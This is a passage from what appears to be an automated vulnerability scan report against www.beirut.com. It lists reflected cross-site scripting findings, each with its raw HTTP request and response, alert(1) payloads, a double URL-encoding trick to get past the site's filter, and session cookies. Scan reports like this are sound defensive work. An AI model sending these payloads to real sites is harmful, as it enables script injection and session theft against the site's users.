The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/Yasmina-Fayed/6158b6bf2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee39e0afcf6e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:40:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=6158b6bf2"><script>alert(1)</script>e39e0afcf6e&randstyle=magenta">
...[SNIP]...

4.1113. http://www.beirut.com/ThingsToDo/Hamra/Yasmina-Fayed/6158 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Hamra/Yasmina-Fayed/6158

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6eb4%2527%253balert%25281%2529%252f%252f4d324e216e was submitted in the REST URL parameter 4. This input was echoed as f6eb4';alert(1)//4d324e216e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Hamra/Yasmina-Fayed/6158f6eb4%2527%253balert%25281%2529%252f%252f4d324e216e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:41:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='6158f6eb4';alert(1)//4d324e216e';
var showfacebox='';
</script>
...[SNIP]...

4.1114. http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Live-Music/560568055

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39723"><a>09dc4a4ee5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo39723"><a>09dc4a4ee5/Live-Music/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:01:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=ThingsToDo39723"><a>09dc4a4ee5/Live-Music&listingtype=events.php&Types=">
...[SNIP]...

4.1115. http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Live-Music/560568055

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d954'-alert(1)-'acab0962de2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo5d954'-alert(1)-'acab0962de2/Live-Music/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:12:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDo5d954'-alert(1)-'acab0962de2/Live-Music';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1116. http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Live-Music/560568055

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1c33"><a>3503fd45ff8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Live-Musicb1c33"><a>3503fd45ff8/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:16:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo/Live-Musicb1c33"><a>3503fd45ff8&listingtype=events.php&Types=2">
...[SNIP]...

4.1117. http://www.beirut.com/ThingsToDo/Live-Music/560568055 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Live-Music/560568055

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ec8f'-alert(1)-'e79945d96e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Live-Music4ec8f'-alert(1)-'e79945d96e9/560568055 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:27:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='ThingsToDo/Live-Music4ec8f'-alert(1)-'e79945d96e9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1118. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bdc"><a>e917fcc1615 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDoe3bdc"><a>e917fcc1615/Markets-and-Deals/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:44:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=ThingsToDoe3bdc"><a>e917fcc1615/Markets-and-Deals&listingtype=events.php&Types=">
...[SNIP]...

4.1119. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1309b'-alert(1)-'bd06f90935b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo1309b'-alert(1)-'bd06f90935b/Markets-and-Deals/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:53:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='ThingsToDo1309b'-alert(1)-'bd06f90935b/Markets-and-Deals';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1120. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e6c8"><a>bfb5ed55339 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Markets-and-Deals5e6c8"><a>bfb5ed55339/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:56:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo/Markets-and-Deals5e6c8"><a>bfb5ed55339&listingtype=events.php&Types=19">
...[SNIP]...

4.1121. http://www.beirut.com/ThingsToDo/Markets-and-Deals/0106299254 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Markets-and-Deals/0106299254

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceee6'-alert(1)-'21ad3a8efea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Markets-and-Dealsceee6'-alert(1)-'21ad3a8efea/0106299254 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:06:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDo/Markets-and-Dealsceee6'-alert(1)-'21ad3a8efea';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1122. http://www.beirut.com/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a60%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57f053acbda was submitted in the REST URL parameter 4. This input was echoed as 95a60"><script>alert(1)</script>57f053acbda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/604495a60%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57f053acbda HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:37:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=604495a60"><script>alert(1)</script>57f053acbda&randstyle=magenta">
...[SNIP]...

4.1123. http://www.beirut.com/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acdf4%2527%253balert%25281%2529%252f%252f798aee3afea was submitted in the REST URL parameter 4. This input was echoed as acdf4';alert(1)//798aee3afea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044acdf4%2527%253balert%25281%2529%252f%252f798aee3afea HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:38:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='6044acdf4';alert(1)//798aee3afea';
var showfacebox='';
</script>
...[SNIP]...

4.1124. http://www.beirut.com/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f8ae%2527%253balert%25281%2529%252f%252f3e321c74abf was submitted in the REST URL parameter 4. This input was echoed as 7f8ae';alert(1)//3e321c74abf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/59957f8ae%2527%253balert%25281%2529%252f%252f3e321c74abf HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
